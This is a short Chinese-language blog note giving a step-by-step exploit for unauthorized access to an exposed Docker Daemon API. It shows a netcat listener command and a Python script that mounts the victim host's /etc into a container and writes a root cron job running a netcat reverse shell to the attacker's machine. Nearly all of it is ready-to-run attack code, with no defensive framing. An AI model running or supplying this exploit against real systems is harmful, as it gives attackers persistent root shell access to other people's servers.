【笔记】DockerDaemonAPI未授权访问漏洞利用

发表于 更新于 阅读次数:

前言

DockerDaemonAPI未授权访问漏洞利用

攻击者监听反弹Shell

1
nc -lvp <port_local>

编写exp

<ip_remote>:受害者IP地址
<ip_local>:攻击者IP地址
<port_local>:攻击者IP地址

exp.py
1
2
3
4
import docker

client = docker.DockerClient(base_url="http://<ip_remote>:2375")
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc <ip_local> <port_local> -e /bin/sh' >> /tmp/etc/crontabs/root"''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

执行exp

1
python3 exp.py

完成